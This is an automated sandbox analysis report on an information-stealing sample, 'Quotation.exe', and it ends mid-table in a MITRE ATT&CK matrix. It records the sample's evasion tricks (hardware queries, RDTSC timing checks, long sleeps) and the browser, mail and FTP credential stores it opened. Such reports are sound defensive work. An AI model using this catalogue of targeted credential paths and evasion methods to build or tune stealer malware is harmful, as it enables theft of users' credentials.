            Source: Quotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2334492638.000000000A0C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_6FF82351 GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FF82351
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_00150C55 push ebx; retf 6_2_00150C52
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_00150C6D push edi; retf 6_2_00150C7A
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_3B6776A8 push esp; iretd 6_2_3B6776B9
            Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Quotation.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: A57F737
            Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: 6FFF737
            Source: C:\Users\user\Desktop\Quotation.exeRDTSC instruction interceptor: First address: A5294F9 second address: A5294F9 instructions: 0x00000000 rdtsc 0x00000002 test al, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F00F4876A03h 0x00000008 cmp ah, FFFFFFEEh 0x0000000b test ebx, eax 0x0000000d inc ebp 0x0000000e inc ebx 0x0000000f push esi 0x00000010 mov esi, 5BB11FD2h 0x00000015 cmp esi, 13h 0x00000018 jng 00007F00F48CDBA3h 0x0000001e pop esi 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\Quotation.exeRDTSC instruction interceptor: First address: 6FA94F9 second address: 6FA94F9 instructions: 0x00000000 rdtsc 0x00000002 test al, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F00F522C823h 0x00000008 cmp ah, FFFFFFEEh 0x0000000b test ebx, eax 0x0000000d inc ebp 0x0000000e inc ebx 0x0000000f push esi 0x00000010 mov esi, 5BB11FD2h 0x00000015 cmp esi, 13h 0x00000018 jng 00007F00F52839C3h 0x0000001e pop esi 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\Quotation.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeMemory allocated: 38360000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeMemory allocated: 380B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199985Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199875Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199766Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199641Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199531Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199422Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199295Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199184Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeWindow / User API: threadDelayed 7782Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeWindow / User API: threadDelayed 2062Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Quotation.exeEvaded block: after key decisiongraph_0-3126
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep count: 39 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -35971150943733603s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6812Thread sleep count: 7782 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -99875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6812Thread sleep count: 2062 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -99765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -99656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -99547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -99437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -99328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -99219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -99109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -99000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -98890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -98781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -98672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -98562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -98453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -98344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -98234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -98125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -98014s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -97906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -97797s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -97687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -97576s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -97431s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -97325s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -97209s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -97062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -96953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -96767s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -96641s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -96531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -96422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -96312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -96203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -96094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -95969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -95859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -95750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -95640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -95531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -95422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -95312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -95203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -1199985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -1199875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -1199766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -1199641s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -1199531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -1199422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -1199295s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6620Thread sleep time: -1199184s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Quotation.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Quotation.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004066F7 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004066F7
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004065AD FindFirstFileW,FindClose,0_2_004065AD
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99875Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99765Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99656Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99547Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99437Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99328Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99219Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99109Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99000Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98890Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98781Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98672Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98562Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98453Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98344Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98234Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98125Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98014Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97906Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97797Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97687Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97576Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97431Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97325Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97209Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97062Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 96953Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 96767Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 96641Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 96531Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 96422Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 96312Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 96203Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 96094Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 95969Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 95859Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 95750Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 95640Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 95531Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 95422Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 95312Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 95203Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199985Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199875Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199766Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199641Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199531Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199422Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199295Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199184Jump to behavior
            Source: Quotation.exe, 00000006.00000002.2780628654.0000000007C07000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2780628654.0000000007C72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Quotation.exeAPI call chain: ExitProcess graph end nodegraph_0-3014
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_6FF82351 GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FF82351
            Source: C:\Users\user\Desktop\Quotation.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Users\user\Desktop\Quotation.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036DA
            Source: C:\Users\user\Desktop\Quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000006.00000002.2801542235.00000000383DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2801542235.00000000383B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 4068, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 00000006.00000002.2801542235.00000000383B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 4068, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000006.00000002.2801542235.00000000383DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2801542235.00000000383B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 4068, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            3
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Native API
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Obfuscated Files or Information
            11
            Input Capture
            225
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
            Process Injection
            1
            DLL Side-Loading
            1
            Credentials in Registry
            1
            Query Registry
            SMB/Windows Admin Shares1
            Email Collection
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Masquerading
            NTDS311
            Security Software Discovery
            Distributed Component Object Model11
            Input Capture
            2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script141
            Virtualization/Sandbox Evasion
            LSA Secrets141
            Virtualization/Sandbox Evasion
            SSH1
            Clipboard Data
            23
